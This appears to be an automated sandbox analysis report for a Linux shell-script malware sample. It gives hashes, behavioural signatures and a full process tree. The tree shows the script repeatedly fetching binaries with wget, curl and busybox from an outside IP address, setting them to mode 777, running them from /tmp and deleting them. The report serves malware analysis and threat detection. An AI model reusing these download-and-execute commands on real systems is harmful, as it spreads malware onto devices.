Analysis
-
max time kernel
150s -
max time network
154s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
28/10/2024, 02:06
Static task
static1
Behavioral task
behavioral1
Sample
0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
-
Size
10KB
-
MD5
d8ec12ed2845ad2e0438b2877c6b582d
-
SHA1
a3ac76cc85f6efe3ee7d9dc250c3167a1316c3b3
-
SHA256
0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24
-
SHA512
459b2e4080a48df3a9e1bcb0b60ca4c80cc2c0b477289a9db6ac26410638c43ecc9c345277a59f191be55b9b37bf113d558d4d1bc8316777707737d80b280d96
-
SSDEEP
192:P/TslVfHcsv+SU0iyP8okBODl/V1aBVpqcsv+So/TslVNiyP8okrzV1aBV2:P/TslVfHcsv+SU0iyP8oYODlmqcsv+Sg
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 26 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 947 chmod 766 chmod 813 chmod 820 chmod 886 chmod 892 chmod 910 chmod 922 chmod 959 chmod 840 chmod 874 chmod 928 chmod 953 chmod 734 chmod 742 chmod 898 chmod 916 chmod 935 chmod 965 chmod 748 chmod 789 chmod 826 chmod 866 chmod 880 chmod 904 chmod 941 chmod -
Executes dropped EXE 26 IoCs
ioc pid Process /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 735 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd 743 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX 749 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 768 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme 790 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc 814 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB 821 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N 827 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS 841 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G 867 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ 875 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 881 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly 887 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 893 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 899 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 905 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd 911 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX 917 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme 923 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS 929 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G 936 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc 942 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB 948 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N 954 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 960 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ 966 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 27 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc curl File opened for modification /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 curl File opened for modification /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS curl File opened for modification /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G curl File opened for modification /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ curl File opened for modification /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 curl File opened for modification /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd curl File opened for modification /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N curl File opened for modification /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly curl File opened for modification /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N curl File opened for modification /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 curl File opened for modification /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB curl File opened for modification /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd curl File opened for modification /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 curl File opened for modification /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 curl File opened for modification /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme curl File opened for modification /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB curl File opened for modification /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ curl File opened for modification /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 curl File opened for modification /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 curl File opened for modification /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme curl File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX curl File opened for modification /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS curl File opened for modification /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 curl File opened for modification /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G curl File opened for modification /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc curl File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX curl
Processes
-
/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh1⤵PID:704
-
/bin/rm/bin/rm bins.sh2⤵PID:709
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵PID:714
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:721
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵PID:731
-
-
/bin/chmodchmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- Executes dropped EXE
PID:735
-
-
/bin/rmrm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵PID:737
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:738
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:741
-
-
/bin/chmodchmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:744
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:745
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:747
-
-
/bin/chmodchmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:750
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵PID:751
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵PID:763
-
-
/bin/chmodchmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- File and Directory Permissions Modification
PID:766
-
-
/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵PID:771
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:772
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:777
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:785
-
-
/bin/chmodchmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- File and Directory Permissions Modification
PID:789
-
-
/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- Executes dropped EXE
PID:790
-
-
/bin/rmrm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:793
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:794
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:811
-
-
/bin/chmodchmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- Executes dropped EXE
PID:814
-
-
/bin/rmrm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:816
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵PID:817
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵PID:819
-
-
/bin/chmodchmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵PID:822
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵PID:825
-
-
/bin/chmodchmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵PID:828
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:829
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:830
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:837
-
-
/bin/chmodchmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:844
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵PID:846
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵PID:862
-
-
/bin/chmodchmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵PID:868
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:873
-
-
/bin/chmodchmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:879
-
-
/bin/chmodchmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵PID:885
-
-
/bin/chmodchmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵PID:891
-
-
/bin/chmodchmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵PID:897
-
-
/bin/chmodchmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵PID:903
-
-
/bin/chmodchmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:909
-
-
/bin/chmodchmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:912
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:915
-
-
/bin/chmodchmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:918
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:919
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:921
-
-
/bin/chmodchmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:924
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:925
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:927
-
-
/bin/chmodchmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:930
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵PID:931
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵PID:934
-
-
/bin/chmodchmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵PID:937
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:938
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:940
-
-
